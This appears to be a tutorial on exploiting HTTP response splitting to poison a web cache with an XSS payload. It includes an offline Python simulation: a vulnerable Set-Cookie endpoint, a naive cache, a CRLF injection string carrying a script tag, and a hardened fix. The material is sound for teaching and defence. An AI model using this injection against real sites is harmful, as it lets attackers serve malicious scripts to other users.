Brief explanation of how the cache works
To exploit this vulnerability we first have to understand how the cache works. To speed up responses, the cache stores each server response keyed by the request that produced it, like this:

/login => login page
/admin => admin page
/register => register page
/posts => posts page

So when we request /posts, for example, the cache sends us the server response it has stored for /posts instead of asking the server again.
What is HTTP Response Splitting?
HTTP Response Splitting is a form of CRLF injection: by getting a carriage return and line feed (%0d%0a) into a response header value, such as the value of a Set-Cookie header, we can terminate the server's response early and append a second, fully attacker-controlled response:

HTTP/1.1 302 FOUND
[...]
Set-Cookie: theme=dark

HTTP/1.1 200 OK
[...]
How can this be used to exploit an XSS?
First, we have to empty the cache, so that the responses already linked to requests are discarded; otherwise we will not be able to replace them. Secondly, we have to send our injection, which makes the server emit our second response. Finally, we have to request the page we want the injected response to be linked to: the cache pairs the next response on the connection, which is ours, with that request and stores it. We can perform it with a little python script:
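The author's script is not reproduced on this page. As an added example (not the original script, and not code from the target), here is an offline Python simulation of the whole chain: the vulnerable Set-Cookie endpoint from the section above, a cache that pairs each forwarded request with the next response on its persistent upstream connection, and the three steps just described. The endpoint path /settings?theme=, the page contents and the cache's pairing behaviour are assumptions made for the simulation; the hardened variant shows the fix of rejecting CR/LF in header values.

```python
# Added example (not the page's own script): a simulation of cache poisoning
# through HTTP response splitting. Server, cache and attacker are in-memory
# so it runs offline; the endpoint name /settings?theme= and the pairing
# behaviour of the cache are assumptions, not taken from the target.
import re
from urllib.parse import quote, unquote

CRLF = "\r\n"

# Pages the cache stores by request path (constructed sample data).
PAGES = {"/login": "login page", "/admin": "admin page",
         "/register": "register page", "/posts": "posts page"}


def vulnerable_set_theme(theme):
    """The vulnerable endpoint: the theme value is copied into Set-Cookie
    without removing CR/LF, so it can end the headers and start a second
    response. Set-Cookie is the last header, so the server's own trailing
    CRLFs land after the injected body, where the parser skips them."""
    return ("HTTP/1.1 302 FOUND" + CRLF + "Location: /" + CRLF
            + "Content-Length: 0" + CRLF
            + "Set-Cookie: theme=" + theme + CRLF + CRLF)


def hardened_set_theme(theme):
    """Fixed version: header values must not contain CR or LF."""
    if "\r" in theme or "\n" in theme:
        return "HTTP/1.1 400 Bad Request" + CRLF + "Content-Length: 0" + CRLF + CRLF
    return vulnerable_set_theme(theme)


def make_backend(set_theme):
    """Origin server: serves PAGES plus the theme endpoint built by set_theme."""
    def backend(path):
        if path.startswith("/settings?theme="):
            return set_theme(unquote(path[len("/settings?theme="):]))
        body = PAGES.get(path, "not found")   # ASCII only, so len() is a byte count
        return ("HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF
                + "Content-Length: " + str(len(body)) + CRLF + CRLF + body)
    return backend


def next_response(stream):
    """Take one complete response off the front of the upstream stream,
    framed by Content-Length, and return (response, remaining data)."""
    while stream.startswith(CRLF):        # tolerate empty lines between responses
        stream = stream[2:]
    head_end = stream.index(CRLF + CRLF)
    m = re.search(r"^Content-Length:\s*(\d+)\s*$", stream[:head_end], re.M | re.I)
    end = head_end + 4 + (int(m.group(1)) if m else 0)
    return stream[:end], stream[end:]


class NaiveCache:
    """Caches by path and reuses one persistent upstream connection: each
    forwarded request is paired with the next response that arrives on
    that connection, which is exactly what response splitting abuses."""
    def __init__(self, backend):
        self.backend = backend
        self.store = {}
        self.buffer = ""   # received from upstream but not yet consumed

    def clear(self):
        self.store.clear()

    def request(self, path):
        if path in self.store:
            return self.store[path]
        self.buffer += self.backend(path)
        response, self.buffer = next_response(self.buffer)
        self.store[path] = response
        return response


# The attacker's cookie value: closes the 302's headers, then supplies a
# complete second response carrying the XSS payload.
XSS_BODY = "<script>alert(document.domain)</script>"
INJECTED = ("dark" + CRLF + CRLF
            + "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF
            + "Content-Length: " + str(len(XSS_BODY)) + CRLF + CRLF + XSS_BODY)


def poison(cache, victim_path="/posts"):
    """The three steps from the text; returns what a later visitor of
    victim_path now receives from the cache."""
    cache.clear()                                                 # 1. empty the cache
    cache.request("/settings?theme=" + quote(INJECTED, safe=""))  # 2. inject: the cache consumes
                                                                  #    the 302, our 200 stays buffered
    cache.request(victim_path)                                    # 3. our buffered 200 is paired with
                                                                  #    this request and cached under it
    return cache.request(victim_path)


def run(set_theme):
    """Run the attack against a cache in front of the given theme endpoint."""
    return poison(NaiveCache(make_backend(set_theme)))


if __name__ == "__main__":
    print(run(vulnerable_set_theme))   # injected response containing the script tag
    print(run(hardened_set_theme))     # the real posts page
```

Run it directly to see both outcomes. The ordering matters: the cache consumes the 302 for the injection request, so the attacker-supplied 200 is the next thing waiting on the connection and is paired with whatever request follows, which is why the target page must be requested right after the injection and why that path must not already be cached. Against the hardened endpoint the same sequence leaves /posts holding the real page.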